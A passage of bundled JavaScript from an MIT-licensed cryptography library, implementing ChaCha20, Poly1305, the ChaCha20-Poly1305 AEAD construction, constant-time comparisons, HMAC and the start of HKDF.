        $3ca0635e21db662f$var$core(block, nc, key);
        // XOR block bytes with src into dst.
        for(var j = i; j < i + 64 && j < src.length; j++)dst[j] = src[j] ^ block[j - i];
        // Increment counter.
        $3ca0635e21db662f$var$incrementCounter(nc, 0, counterLength);
    }
    // Cleanup temporary space.
    $276678191c4bdb56$exports.wipe(block);
    if (nonceInplaceCounterLength === 0) // Cleanup counter.
    $276678191c4bdb56$exports.wipe(nc);
    return dst;
}
$3ca0635e21db662f$exports.streamXOR = $3ca0635e21db662f$var$streamXOR;
/**
 * Generate ChaCha20 stream for the given 32-byte key and 8-byte or 12-byte
 * nonce and write it into dst and return it.
 *
 * Never use the same key and nonce to generate more than one stream.
 *
 * If nonceInplaceCounterLength is not 0, it behaves the same with respect to
 * the nonce as described in the streamXOR documentation.
 *
 * stream is like streamXOR with all-zero src.
 */ function $3ca0635e21db662f$var$stream(key, nonce, dst, nonceInplaceCounterLength) {
    if (nonceInplaceCounterLength === void 0) nonceInplaceCounterLength = 0;
    $276678191c4bdb56$exports.wipe(dst);
    return $3ca0635e21db662f$var$streamXOR(key, nonce, dst, dst, nonceInplaceCounterLength);
}
$3ca0635e21db662f$exports.stream = $3ca0635e21db662f$var$stream;
function $3ca0635e21db662f$var$incrementCounter(counter, pos, len) {
    var carry = 1;
    while(len--){
        carry = carry + (counter[pos] & 0xff) | 0;
        counter[pos] = carry & 0xff;
        carry >>>= 8;
        pos++;
    }
    if (carry > 0) throw new Error("ChaCha: counter overflow");
}


var $bc2eb21e5dd3f530$exports = {};
"use strict";
// Copyright (C) 2016 Dmitry Chestnykh
// MIT License. See LICENSE file for details.
Object.defineProperty($bc2eb21e5dd3f530$exports, "__esModule", {
    value: true
});
var $0806512cf7f87b87$exports = {};
"use strict";
// Copyright (C) 2016 Dmitry Chestnykh
// MIT License. See LICENSE file for details.
Object.defineProperty($0806512cf7f87b87$exports, "__esModule", {
    value: true
});
/**
 * Package constant-time provides functions for performing algorithmically constant-time operations.
 */ /**
 * NOTE! Due to the inability to guarantee real constant time evaluation of
 * anything in JavaScript VM, this is module is the best effort.
 */ /**
 * Returns resultIfOne if subject is 1, or resultIfZero if subject is 0.
 *
 * Supports only 32-bit integers, so resultIfOne or resultIfZero are not
 * integers, they'll be converted to them with bitwise operations.
 */ function $0806512cf7f87b87$var$select(subject, resultIfOne, resultIfZero) {
    return ~(subject - 1) & resultIfOne | subject - 1 & resultIfZero;
}
$0806512cf7f87b87$exports.select = $0806512cf7f87b87$var$select;
/**
 * Returns 1 if a <= b, or 0 if not.
 * Arguments must be positive 32-bit integers less than or equal to 2^31 - 1.
 */ function $0806512cf7f87b87$var$lessOrEqual(a, b) {
    return (a | 0) - (b | 0) - 1 >>> 31 & 1;
}
$0806512cf7f87b87$exports.lessOrEqual = $0806512cf7f87b87$var$lessOrEqual;
/**
 * Returns 1 if a and b are of equal length and their contents
 * are equal, or 0 otherwise.
 *
 * Note that unlike in equal(), zero-length inputs are considered
 * the same, so this function will return 1.
 */ function $0806512cf7f87b87$var$compare(a, b) {
    if (a.length !== b.length) return 0;
    var result = 0;
    for(var i = 0; i < a.length; i++)result |= a[i] ^ b[i];
    return 1 & result - 1 >>> 8;
}
$0806512cf7f87b87$exports.compare = $0806512cf7f87b87$var$compare;
/**
 * Returns true if a and b are of equal non-zero length,
 * and their contents are equal, or false otherwise.
 *
 * Note that unlike in compare() zero-length inputs are considered
 * _not_ equal, so this function will return false.
 */ function $0806512cf7f87b87$var$equal(a, b) {
    if (a.length === 0 || b.length === 0) return false;
    return $0806512cf7f87b87$var$compare(a, b) !== 0;
}
$0806512cf7f87b87$exports.equal = $0806512cf7f87b87$var$equal;



$bc2eb21e5dd3f530$exports.DIGEST_LENGTH = 16;
// Port of Andrew Moon's Poly1305-donna-16. Public domain.
// https://github.com/floodyberry/poly1305-donna
/**
 * Poly1305 computes 16-byte authenticator of message using
 * a one-time 32-byte key.
 *
 * Important: key should be used for only one message,
 * it should never repeat.
 */ var $bc2eb21e5dd3f530$var$Poly1305 = /** @class */ function() {
    function Poly1305(key) {
        this.digestLength = $bc2eb21e5dd3f530$exports.DIGEST_LENGTH;
        this._buffer = new Uint8Array(16);
        this._r = new Uint16Array(10);
        this._h = new Uint16Array(10);
        this._pad = new Uint16Array(8);
        this._leftover = 0;
        this._fin = 0;
        this._finished = false;
        var t0 = key[0] | key[1] << 8;
        this._r[0] = t0 & 0x1fff;
        var t1 = key[2] | key[3] << 8;
        this._r[1] = (t0 >>> 13 | t1 << 3) & 0x1fff;
        var t2 = key[4] | key[5] << 8;
        this._r[2] = (t1 >>> 10 | t2 << 6) & 0x1f03;
        var t3 = key[6] | key[7] << 8;
        this._r[3] = (t2 >>> 7 | t3 << 9) & 0x1fff;
        var t4 = key[8] | key[9] << 8;
        this._r[4] = (t3 >>> 4 | t4 << 12) & 0x00ff;
        this._r[5] = t4 >>> 1 & 0x1ffe;
        var t5 = key[10] | key[11] << 8;
        this._r[6] = (t4 >>> 14 | t5 << 2) & 0x1fff;
        var t6 = key[12] | key[13] << 8;
        this._r[7] = (t5 >>> 11 | t6 << 5) & 0x1f81;
        var t7 = key[14] | key[15] << 8;
        this._r[8] = (t6 >>> 8 | t7 << 8) & 0x1fff;
        this._r[9] = t7 >>> 5 & 0x007f;
        this._pad[0] = key[16] | key[17] << 8;
        this._pad[1] = key[18] | key[19] << 8;
        this._pad[2] = key[20] | key[21] << 8;
        this._pad[3] = key[22] | key[23] << 8;
        this._pad[4] = key[24] | key[25] << 8;
        this._pad[5] = key[26] | key[27] << 8;
        this._pad[6] = key[28] | key[29] << 8;
        this._pad[7] = key[30] | key[31] << 8;
    }
    Poly1305.prototype._blocks = function(m, mpos, bytes) {
        var hibit = this._fin ? 0 : 2048;
        var h0 = this._h[0], h1 = this._h[1], h2 = this._h[2], h3 = this._h[3], h4 = this._h[4], h5 = this._h[5], h6 = this._h[6], h7 = this._h[7], h8 = this._h[8], h9 = this._h[9];
        var r0 = this._r[0], r1 = this._r[1], r2 = this._r[2], r3 = this._r[3], r4 = this._r[4], r5 = this._r[5], r6 = this._r[6], r7 = this._r[7], r8 = this._r[8], r9 = this._r[9];
        while(bytes >= 16){
            var t0 = m[mpos + 0] | m[mpos + 1] << 8;
            h0 += t0 & 0x1fff;
            var t1 = m[mpos + 2] | m[mpos + 3] << 8;
            h1 += (t0 >>> 13 | t1 << 3) & 0x1fff;
            var t2 = m[mpos + 4] | m[mpos + 5] << 8;
            h2 += (t1 >>> 10 | t2 << 6) & 0x1fff;
            var t3 = m[mpos + 6] | m[mpos + 7] << 8;
            h3 += (t2 >>> 7 | t3 << 9) & 0x1fff;
            var t4 = m[mpos + 8] | m[mpos + 9] << 8;
            h4 += (t3 >>> 4 | t4 << 12) & 0x1fff;
            h5 += t4 >>> 1 & 0x1fff;
            var t5 = m[mpos + 10] | m[mpos + 11] << 8;
            h6 += (t4 >>> 14 | t5 << 2) & 0x1fff;
            var t6 = m[mpos + 12] | m[mpos + 13] << 8;
            h7 += (t5 >>> 11 | t6 << 5) & 0x1fff;
            var t7 = m[mpos + 14] | m[mpos + 15] << 8;
            h8 += (t6 >>> 8 | t7 << 8) & 0x1fff;
            h9 += t7 >>> 5 | hibit;
            var c = 0;
            var d0 = c;
            d0 += h0 * r0;
            d0 += h1 * (5 * r9);
            d0 += h2 * (5 * r8);
            d0 += h3 * (5 * r7);
            d0 += h4 * (5 * r6);
            c = d0 >>> 13;
            d0 &= 0x1fff;
            d0 += h5 * (5 * r5);
            d0 += h6 * (5 * r4);
            d0 += h7 * (5 * r3);
            d0 += h8 * (5 * r2);
            d0 += h9 * (5 * r1);
            c += d0 >>> 13;
            d0 &= 0x1fff;
            var d1 = c;
            d1 += h0 * r1;
            d1 += h1 * r0;
            d1 += h2 * (5 * r9);
            d1 += h3 * (5 * r8);
            d1 += h4 * (5 * r7);
            c = d1 >>> 13;
            d1 &= 0x1fff;
            d1 += h5 * (5 * r6);
            d1 += h6 * (5 * r5);
            d1 += h7 * (5 * r4);
            d1 += h8 * (5 * r3);
            d1 += h9 * (5 * r2);
            c += d1 >>> 13;
            d1 &= 0x1fff;
            var d2 = c;
            d2 += h0 * r2;
            d2 += h1 * r1;
            d2 += h2 * r0;
            d2 += h3 * (5 * r9);
            d2 += h4 * (5 * r8);
            c = d2 >>> 13;
            d2 &= 0x1fff;
            d2 += h5 * (5 * r7);
            d2 += h6 * (5 * r6);
            d2 += h7 * (5 * r5);
            d2 += h8 * (5 * r4);
            d2 += h9 * (5 * r3);
            c += d2 >>> 13;
            d2 &= 0x1fff;
            var d3 = c;
            d3 += h0 * r3;
            d3 += h1 * r2;
            d3 += h2 * r1;
            d3 += h3 * r0;
            d3 += h4 * (5 * r9);
            c = d3 >>> 13;
            d3 &= 0x1fff;
            d3 += h5 * (5 * r8);
            d3 += h6 * (5 * r7);
            d3 += h7 * (5 * r6);
            d3 += h8 * (5 * r5);
            d3 += h9 * (5 * r4);
            c += d3 >>> 13;
            d3 &= 0x1fff;
            var d4 = c;
            d4 += h0 * r4;
            d4 += h1 * r3;
            d4 += h2 * r2;
            d4 += h3 * r1;
            d4 += h4 * r0;
            c = d4 >>> 13;
            d4 &= 0x1fff;
            d4 += h5 * (5 * r9);
            d4 += h6 * (5 * r8);
            d4 += h7 * (5 * r7);
            d4 += h8 * (5 * r6);
            d4 += h9 * (5 * r5);
            c += d4 >>> 13;
            d4 &= 0x1fff;
            var d5 = c;
            d5 += h0 * r5;
            d5 += h1 * r4;
            d5 += h2 * r3;
            d5 += h3 * r2;
            d5 += h4 * r1;
            c = d5 >>> 13;
            d5 &= 0x1fff;
            d5 += h5 * r0;
            d5 += h6 * (5 * r9);
            d5 += h7 * (5 * r8);
            d5 += h8 * (5 * r7);
            d5 += h9 * (5 * r6);
            c += d5 >>> 13;
            d5 &= 0x1fff;
            var d6 = c;
            d6 += h0 * r6;
            d6 += h1 * r5;
            d6 += h2 * r4;
            d6 += h3 * r3;
            d6 += h4 * r2;
            c = d6 >>> 13;
            d6 &= 0x1fff;
            d6 += h5 * r1;
            d6 += h6 * r0;
            d6 += h7 * (5 * r9);
            d6 += h8 * (5 * r8);
            d6 += h9 * (5 * r7);
            c += d6 >>> 13;
            d6 &= 0x1fff;
            var d7 = c;
            d7 += h0 * r7;
            d7 += h1 * r6;
            d7 += h2 * r5;
            d7 += h3 * r4;
            d7 += h4 * r3;
            c = d7 >>> 13;
            d7 &= 0x1fff;
            d7 += h5 * r2;
            d7 += h6 * r1;
            d7 += h7 * r0;
            d7 += h8 * (5 * r9);
            d7 += h9 * (5 * r8);
            c += d7 >>> 13;
            d7 &= 0x1fff;
            var d8 = c;
            d8 += h0 * r8;
            d8 += h1 * r7;
            d8 += h2 * r6;
            d8 += h3 * r5;
            d8 += h4 * r4;
            c = d8 >>> 13;
            d8 &= 0x1fff;
            d8 += h5 * r3;
            d8 += h6 * r2;
            d8 += h7 * r1;
            d8 += h8 * r0;
            d8 += h9 * (5 * r9);
            c += d8 >>> 13;
            d8 &= 0x1fff;
            var d9 = c;
            d9 += h0 * r9;
            d9 += h1 * r8;
            d9 += h2 * r7;
            d9 += h3 * r6;
            d9 += h4 * r5;
            c = d9 >>> 13;
            d9 &= 0x1fff;
            d9 += h5 * r4;
            d9 += h6 * r3;
            d9 += h7 * r2;
            d9 += h8 * r1;
            d9 += h9 * r0;
            c += d9 >>> 13;
            d9 &= 0x1fff;
            c = (c << 2) + c | 0;
            c = c + d0 | 0;
            d0 = c & 0x1fff;
            c = c >>> 13;
            d1 += c;
            h0 = d0;
            h1 = d1;
            h2 = d2;
            h3 = d3;
            h4 = d4;
            h5 = d5;
            h6 = d6;
            h7 = d7;
            h8 = d8;
            h9 = d9;
            mpos += 16;
            bytes -= 16;
        }
        this._h[0] = h0;
        this._h[1] = h1;
        this._h[2] = h2;
        this._h[3] = h3;
        this._h[4] = h4;
        this._h[5] = h5;
        this._h[6] = h6;
        this._h[7] = h7;
        this._h[8] = h8;
        this._h[9] = h9;
    };
    Poly1305.prototype.finish = function(mac, macpos) {
        if (macpos === void 0) macpos = 0;
        var g = new Uint16Array(10);
        var c;
        var mask;
        var f;
        var i;
        if (this._leftover) {
            i = this._leftover;
            this._buffer[i++] = 1;
            for(; i < 16; i++)this._buffer[i] = 0;
            this._fin = 1;
            this._blocks(this._buffer, 0, 16);
        }
        c = this._h[1] >>> 13;
        this._h[1] &= 0x1fff;
        for(i = 2; i < 10; i++){
            this._h[i] += c;
            c = this._h[i] >>> 13;
            this._h[i] &= 0x1fff;
        }
        this._h[0] += c * 5;
        c = this._h[0] >>> 13;
        this._h[0] &= 0x1fff;
        this._h[1] += c;
        c = this._h[1] >>> 13;
        this._h[1] &= 0x1fff;
        this._h[2] += c;
        g[0] = this._h[0] + 5;
        c = g[0] >>> 13;
        g[0] &= 0x1fff;
        for(i = 1; i < 10; i++){
            g[i] = this._h[i] + c;
            c = g[i] >>> 13;
            g[i] &= 0x1fff;
        }
        g[9] -= 8192;
        mask = (c ^ 1) - 1;
        for(i = 0; i < 10; i++)g[i] &= mask;
        mask = ~mask;
        for(i = 0; i < 10; i++)this._h[i] = this._h[i] & mask | g[i];
        this._h[0] = (this._h[0] | this._h[1] << 13) & 0xffff;
        this._h[1] = (this._h[1] >>> 3 | this._h[2] << 10) & 0xffff;
        this._h[2] = (this._h[2] >>> 6 | this._h[3] << 7) & 0xffff;
        this._h[3] = (this._h[3] >>> 9 | this._h[4] << 4) & 0xffff;
        this._h[4] = (this._h[4] >>> 12 | this._h[5] << 1 | this._h[6] << 14) & 0xffff;
        this._h[5] = (this._h[6] >>> 2 | this._h[7] << 11) & 0xffff;
        this._h[6] = (this._h[7] >>> 5 | this._h[8] << 8) & 0xffff;
        this._h[7] = (this._h[8] >>> 8 | this._h[9] << 5) & 0xffff;
        f = this._h[0] + this._pad[0];
        this._h[0] = f & 0xffff;
        for(i = 1; i < 8; i++){
            f = (this._h[i] + this._pad[i] | 0) + (f >>> 16) | 0;
            this._h[i] = f & 0xffff;
        }
        mac[macpos + 0] = this._h[0] >>> 0;
        mac[macpos + 1] = this._h[0] >>> 8;
        mac[macpos + 2] = this._h[1] >>> 0;
        mac[macpos + 3] = this._h[1] >>> 8;
        mac[macpos + 4] = this._h[2] >>> 0;
        mac[macpos + 5] = this._h[2] >>> 8;
        mac[macpos + 6] = this._h[3] >>> 0;
        mac[macpos + 7] = this._h[3] >>> 8;
        mac[macpos + 8] = this._h[4] >>> 0;
        mac[macpos + 9] = this._h[4] >>> 8;
        mac[macpos + 10] = this._h[5] >>> 0;
        mac[macpos + 11] = this._h[5] >>> 8;
        mac[macpos + 12] = this._h[6] >>> 0;
        mac[macpos + 13] = this._h[6] >>> 8;
        mac[macpos + 14] = this._h[7] >>> 0;
        mac[macpos + 15] = this._h[7] >>> 8;
        this._finished = true;
        return this;
    };
    Poly1305.prototype.update = function(m) {
        var mpos = 0;
        var bytes = m.length;
        var want;
        if (this._leftover) {
            want = 16 - this._leftover;
            if (want > bytes) want = bytes;
            for(var i = 0; i < want; i++)this._buffer[this._leftover + i] = m[mpos + i];
            bytes -= want;
            mpos += want;
            this._leftover += want;
            if (this._leftover < 16) return this;
            this._blocks(this._buffer, 0, 16);
            this._leftover = 0;
        }
        if (bytes >= 16) {
            want = bytes - bytes % 16;
            this._blocks(m, mpos, want);
            mpos += want;
            bytes -= want;
        }
        if (bytes) {
            for(var i = 0; i < bytes; i++)this._buffer[this._leftover + i] = m[mpos + i];
            this._leftover += bytes;
        }
        return this;
    };
    Poly1305.prototype.digest = function() {
        // TODO(dchest): it behaves differently than other hashes/HMAC,
        // because it throws when finished — others just return saved result.
        if (this._finished) throw new Error("Poly1305 was finished");
        var mac = new Uint8Array(16);
        this.finish(mac);
        return mac;
    };
    Poly1305.prototype.clean = function() {
        $276678191c4bdb56$exports.wipe(this._buffer);
        $276678191c4bdb56$exports.wipe(this._r);
        $276678191c4bdb56$exports.wipe(this._h);
        $276678191c4bdb56$exports.wipe(this._pad);
        this._leftover = 0;
        this._fin = 0;
        this._finished = true; // mark as finished even if not
        return this;
    };
    return Poly1305;
}();
$bc2eb21e5dd3f530$exports.Poly1305 = $bc2eb21e5dd3f530$var$Poly1305;
/**
 * Returns 16-byte authenticator of data using a one-time 32-byte key.
 *
 * Important: key should be used for only one message, it should never repeat.
 */ function $bc2eb21e5dd3f530$var$oneTimeAuth(key, data) {
    var h = new $bc2eb21e5dd3f530$var$Poly1305(key);
    h.update(data);
    var digest = h.digest();
    h.clean();
    return digest;
}
$bc2eb21e5dd3f530$exports.oneTimeAuth = $bc2eb21e5dd3f530$var$oneTimeAuth;
/**
 * Returns true if two authenticators are 16-byte long and equal.
 * Uses contant-time comparison to avoid leaking timing information.
 */ function $bc2eb21e5dd3f530$var$equal(a, b) {
    if (a.length !== $bc2eb21e5dd3f530$exports.DIGEST_LENGTH || b.length !== $bc2eb21e5dd3f530$exports.DIGEST_LENGTH) return false;
    return $0806512cf7f87b87$exports.equal(a, b);
}
$bc2eb21e5dd3f530$exports.equal = $bc2eb21e5dd3f530$var$equal;





$1ca962bc0b1868f1$exports.KEY_LENGTH = 32;
$1ca962bc0b1868f1$exports.NONCE_LENGTH = 12;
$1ca962bc0b1868f1$exports.TAG_LENGTH = 16;
var $1ca962bc0b1868f1$var$ZEROS = new Uint8Array(16);
/**
 * ChaCha20-Poly1305 Authenticated Encryption with Associated Data.
 *
 * Defined in RFC7539.
 */ var $1ca962bc0b1868f1$var$ChaCha20Poly1305 = /** @class */ function() {
    /**
     * Creates a new instance with the given 32-byte key.
     */ function ChaCha20Poly1305(key) {
        this.nonceLength = $1ca962bc0b1868f1$exports.NONCE_LENGTH;
        this.tagLength = $1ca962bc0b1868f1$exports.TAG_LENGTH;
        if (key.length !== $1ca962bc0b1868f1$exports.KEY_LENGTH) throw new Error("ChaCha20Poly1305 needs 32-byte key");
        // Copy key.
        this._key = new Uint8Array(key);
    }
    /**
     * Encrypts and authenticates plaintext, authenticates associated data,
     * and returns sealed ciphertext, which includes authentication tag.
     *
     * RFC7539 specifies 12 bytes for nonce. It may be this 12-byte nonce
     * ("IV"), or full 16-byte counter (called "32-bit fixed-common part")
     * and nonce.
     *
     * If dst is given (it must be the size of plaintext + the size of tag
     * length) the result will be put into it. Dst and plaintext must not
     * overlap.
     */ ChaCha20Poly1305.prototype.seal = function(nonce, plaintext, associatedData, dst) {
        if (nonce.length > 16) throw new Error("ChaCha20Poly1305: incorrect nonce length");
        // Allocate space for counter, and set nonce as last bytes of it.
        var counter = new Uint8Array(16);
        counter.set(nonce, counter.length - nonce.length);
        // Generate authentication key by taking first 32-bytes of stream.
        // We pass full counter, which has 12-byte nonce and 4-byte block counter,
        // and it will get incremented after generating the block, which is
        // exactly what we need: we only use the first 32 bytes of 64-byte
        // ChaCha block and discard the next 32 bytes.
        var authKey = new Uint8Array(32);
        $3ca0635e21db662f$exports.stream(this._key, counter, authKey, 4);
        // Allocate space for sealed ciphertext.
        var resultLength = plaintext.length + this.tagLength;
        var result;
        if (dst) {
            if (dst.length !== resultLength) throw new Error("ChaCha20Poly1305: incorrect destination length");
            result = dst;
        } else result = new Uint8Array(resultLength);
        // Encrypt plaintext.
        $3ca0635e21db662f$exports.streamXOR(this._key, counter, plaintext, result, 4);
        // Authenticate.
        // XXX: can "simplify" here: pass full result (which is already padded
        // due to zeroes prepared for tag), and ciphertext length instead of
        // subarray of result.
        this._authenticate(result.subarray(result.length - this.tagLength, result.length), authKey, result.subarray(0, result.length - this.tagLength), associatedData);
        // Cleanup.
        $276678191c4bdb56$exports.wipe(counter);
        return result;
    };
    /**
     * Authenticates sealed ciphertext (which includes authentication tag) and
     * associated data, decrypts ciphertext and returns decrypted plaintext.
     *
     * RFC7539 specifies 12 bytes for nonce. It may be this 12-byte nonce
     * ("IV"), or full 16-byte counter (called "32-bit fixed-common part")
     * and nonce.
     *
     * If authentication fails, it returns null.
     *
     * If dst is given (it must be of ciphertext length minus tag length),
     * the result will be put into it. Dst and plaintext must not overlap.
     */ ChaCha20Poly1305.prototype.open = function(nonce, sealed, associatedData, dst) {
        if (nonce.length > 16) throw new Error("ChaCha20Poly1305: incorrect nonce length");
        // Sealed ciphertext should at least contain tag.
        if (sealed.length < this.tagLength) // TODO(dchest): should we throw here instead?
        return null;
        // Allocate space for counter, and set nonce as last bytes of it.
        var counter = new Uint8Array(16);
        counter.set(nonce, counter.length - nonce.length);
        // Generate authentication key by taking first 32-bytes of stream.
        var authKey = new Uint8Array(32);
        $3ca0635e21db662f$exports.stream(this._key, counter, authKey, 4);
        // Authenticate.
        // XXX: can simplify and avoid allocation: since authenticate()
        // already allocates tag (from Poly1305.digest(), it can return)
        // it instead of copying to calculatedTag. But then in seal()
        // we'll need to copy it.
        var calculatedTag = new Uint8Array(this.tagLength);
        this._authenticate(calculatedTag, authKey, sealed.subarray(0, sealed.length - this.tagLength), associatedData);
        // Constant-time compare tags and return null if they differ.
        if (!$0806512cf7f87b87$exports.equal(calculatedTag, sealed.subarray(sealed.length - this.tagLength, sealed.length))) return null;
        // Allocate space for decrypted plaintext.
        var resultLength = sealed.length - this.tagLength;
        var result;
        if (dst) {
            if (dst.length !== resultLength) throw new Error("ChaCha20Poly1305: incorrect destination length");
            result = dst;
        } else result = new Uint8Array(resultLength);
        // Decrypt.
        $3ca0635e21db662f$exports.streamXOR(this._key, counter, sealed.subarray(0, sealed.length - this.tagLength), result, 4);
        // Cleanup.
        $276678191c4bdb56$exports.wipe(counter);
        return result;
    };
    ChaCha20Poly1305.prototype.clean = function() {
        $276678191c4bdb56$exports.wipe(this._key);
        return this;
    };
    ChaCha20Poly1305.prototype._authenticate = function(tagOut, authKey, ciphertext, associatedData) {
        // Initialize Poly1305 with authKey.
        var h = new $bc2eb21e5dd3f530$exports.Poly1305(authKey);
        // Authenticate padded associated data.
        if (associatedData) {
            h.update(associatedData);
            if (associatedData.length % 16 > 0) h.update($1ca962bc0b1868f1$var$ZEROS.subarray(associatedData.length % 16));
        }
        // Authenticate padded ciphertext.
        h.update(ciphertext);
        if (ciphertext.length % 16 > 0) h.update($1ca962bc0b1868f1$var$ZEROS.subarray(ciphertext.length % 16));
        // Authenticate length of associated data.
        // XXX: can avoid allocation here?
        var length = new Uint8Array(8);
        if (associatedData) $ddd89ca0ca71c6d3$exports.writeUint64LE(associatedData.length, length);
        h.update(length);
        // Authenticate length of ciphertext.
        $ddd89ca0ca71c6d3$exports.writeUint64LE(ciphertext.length, length);
        h.update(length);
        // Get tag and copy it into tagOut.
        var tag = h.digest();
        for(var i = 0; i < tag.length; i++)tagOut[i] = tag[i];
        // Cleanup.
        h.clean();
        $276678191c4bdb56$exports.wipe(tag);
        $276678191c4bdb56$exports.wipe(length);
    };
    return ChaCha20Poly1305;
}();
$1ca962bc0b1868f1$exports.ChaCha20Poly1305 = $1ca962bc0b1868f1$var$ChaCha20Poly1305;


var $eea881cb204cba82$exports = {};
"use strict";
// Copyright (C) 2016 Dmitry Chestnykh
// MIT License. See LICENSE file for details.
Object.defineProperty($eea881cb204cba82$exports, "__esModule", {
    value: true
});
var $34e6ca18c8d3a670$exports = {};
"use strict";
// Copyright (C) 2016 Dmitry Chestnykh
// MIT License. See LICENSE file for details.
Object.defineProperty($34e6ca18c8d3a670$exports, "__esModule", {
    value: true
});
var $c3d16a0ee606048e$exports = {};
"use strict";
// Copyright (C) 2016 Dmitry Chestnykh
// MIT License. See LICENSE file for details.
Object.defineProperty($c3d16a0ee606048e$exports, "__esModule", {
    value: true
});
function $c3d16a0ee606048e$var$isSerializableHash(h) {
    return typeof h.saveState !== "undefined" && typeof h.restoreState !== "undefined" && typeof h.cleanSavedState !== "undefined";
}
$c3d16a0ee606048e$exports.isSerializableHash = $c3d16a0ee606048e$var$isSerializableHash; // TODO(dchest): figure out the standardized interface for XOF such as
 // SHAKE and BLAKE2X.




/**
 *  HMAC implements hash-based message authentication algorithm.
 */ var $34e6ca18c8d3a670$var$HMAC = /** @class */ function() {
    /**
     * Constructs a new HMAC with the given Hash and secret key.
     */ function HMAC(hash, key) {
        this._finished = false; // true if HMAC was finalized
        // Initialize inner and outer hashes.
        this._inner = new hash();
        this._outer = new hash();
        // Set block and digest sizes for this HMAC
        // instance to values from the hash.
        this.blockSize = this._outer.blockSize;
        this.digestLength = this._outer.digestLength;
        // Pad temporary stores a key (or its hash) padded with zeroes.
        var pad = new Uint8Array(this.blockSize);
        if (key.length > this.blockSize) // If key is bigger than hash block size, it must be
        // hashed and this hash is used as a key instead.
        this._inner.update(key).finish(pad).clean();
        else // Otherwise, copy the key into pad.
        pad.set(key);
        // Now two different keys are derived from padded key
        // by xoring a different byte value to each.
        // To make inner hash key, xor byte 0x36 into pad.
        for(var i = 0; i < pad.length; i++)pad[i] ^= 0x36;
        // Update inner hash with the result.
        this._inner.update(pad);
        // To make outer hash key, xor byte 0x5c into pad.
        // But since we already xored 0x36 there, we must
        // first undo this by xoring it again.
        for(var i = 0; i < pad.length; i++)pad[i] ^= 106;
        // Update outer hash with the result.
        this._outer.update(pad);
        // Save states of both hashes, so that we can quickly restore
        // them later in reset() without the need to remember the actual
        // key and perform this initialization again.
        if ($c3d16a0ee606048e$exports.isSerializableHash(this._inner) && $c3d16a0ee606048e$exports.isSerializableHash(this._outer)) {
            this._innerKeyedState = this._inner.saveState();
            this._outerKeyedState = this._outer.saveState();
        }
        // Clean pad.
        $276678191c4bdb56$exports.wipe(pad);
    }
    /**
     * Returns HMAC state to the state initialized with key
     * to make it possible to run HMAC over the other data with the same
     * key without creating a new instance.
     */ HMAC.prototype.reset = function() {
        if (!$c3d16a0ee606048e$exports.isSerializableHash(this._inner) || !$c3d16a0ee606048e$exports.isSerializableHash(this._outer)) throw new Error("hmac: can't reset() because hash doesn't implement restoreState()");
        // Restore keyed states of inner and outer hashes.
        this._inner.restoreState(this._innerKeyedState);
        this._outer.restoreState(this._outerKeyedState);
        this._finished = false;
        return this;
    };
    /**
     * Cleans HMAC state.
     */ HMAC.prototype.clean = function() {
        if ($c3d16a0ee606048e$exports.isSerializableHash(this._inner)) this._inner.cleanSavedState(this._innerKeyedState);
        if ($c3d16a0ee606048e$exports.isSerializableHash(this._outer)) this._outer.cleanSavedState(this._outerKeyedState);
        this._inner.clean();
        this._outer.clean();
    };
    /**
     * Updates state with provided data.
     */ HMAC.prototype.update = function(data) {
        this._inner.update(data);
        return this;
    };
    /**
     * Finalizes HMAC and puts the result in out.
     */ HMAC.prototype.finish = function(out) {
        if (this._finished) {
            // If HMAC was finalized, outer hash is also finalized,
            // so it produces the same digest it produced when it
            // was finalized.
            this._outer.finish(out);
            return this;
        }
        // Finalize inner hash and store the result temporarily.
        this._inner.finish(out);
        // Update outer hash with digest of inner hash and and finalize it.
        this._outer.update(out.subarray(0, this.digestLength)).finish(out);
        this._finished = true;
        return this;
    };
    /**
     * Returns the computed message authentication code.
     */ HMAC.prototype.digest = function() {
        var out = new Uint8Array(this.digestLength);
        this.finish(out);
        return out;
    };
    /**
     * Saves HMAC state.
     * This function is needed for PBKDF2 optimization.
     */ HMAC.prototype.saveState = function() {
        if (!$c3d16a0ee606048e$exports.isSerializableHash(this._inner)) throw new Error("hmac: can't saveState() because hash doesn't implement it");
        return this._inner.saveState();
    };
    HMAC.prototype.restoreState = function(savedState) {
        if (!$c3d16a0ee606048e$exports.isSerializableHash(this._inner) || !$c3d16a0ee606048e$exports.isSerializableHash(this._outer)) throw new Error("hmac: can't restoreState() because hash doesn't implement it");
        this._inner.restoreState(savedState);
        this._outer.restoreState(this._outerKeyedState);
        this._finished = false;
        return this;
    };
    HMAC.prototype.cleanSavedState = function(savedState) {
        if (!$c3d16a0ee606048e$exports.isSerializableHash(this._inner)) throw new Error("hmac: can't cleanSavedState() because hash doesn't implement it");
        this._inner.cleanSavedState(savedState);
    };
    return HMAC;
}();
$34e6ca18c8d3a670$exports.HMAC = $34e6ca18c8d3a670$var$HMAC;
/**
 * Returns HMAC using the given hash constructor for the key over data.
 */ function $34e6ca18c8d3a670$var$hmac(hash, key, data) {
    var h = new $34e6ca18c8d3a670$var$HMAC(hash, key);
    h.update(data);
    var digest = h.digest();
    h.clean();
    return digest;
}
$34e6ca18c8d3a670$exports.hmac = $34e6ca18c8d3a670$var$hmac;
/**
 * Returns true if two HMAC digests are equal.
 * Uses constant-time comparison to avoid leaking timing information.
 *
 * Example:
 *
 *    const receivedDigest = ...
 *    const realDigest = hmac(SHA256, key, data);
 *    if (!equal(receivedDigest, realDigest)) {
 *        throw new Error("Authentication error");
 *    }
 */ $34e6ca18c8d3a670$exports.equal = $0806512cf7f87b87$exports.equal;



/**
 * HMAC-based Extract-and-Expand Key Derivation Function.
 *
 * Implements HKDF from RFC5869.
 *
 * Expands the given master key with salt and info into
 * a limited stream of key material.
 */ var $eea881cb204cba82$var$HKDF = /** @class */ function() {
    /**
     * Create a new HKDF instance for the given hash function
     * with the master key, optional salt, and info.
     *
     * - Master key is a high-entropy secret key (not a password).
     * - Salt is a non-secret random value.
     * - Info is application- and/or context-specific information.
     */ function HKDF(hash, key, salt, info) {
        if (salt === void 0) salt = new Uint8Array(0);
        this._counter = new Uint8Array(1); // starts with zero
        this._hash = hash;
        this._info = info;
        // HKDF-Extract uses salt as HMAC key, and key as data.
        var okm = $34e6ca18c8d3a670$exports.hmac(this._hash, salt, key);
        // Initialize HMAC for expanding with extracted key.
        this._hmac = new $34e6ca18c8d3a670$exports.HMAC(hash, okm);
        // Allocate buffer.
        this._buffer = new Uint8Array(this._hmac.digestLength);
        this._bufpos = this._buffer.length;
    }
    // Fill buffer with new block of HKDF-Extract output.
    HKDF.prototype._fillBuffer = function() {
        // Increment counter.
        this._counter[0]++;
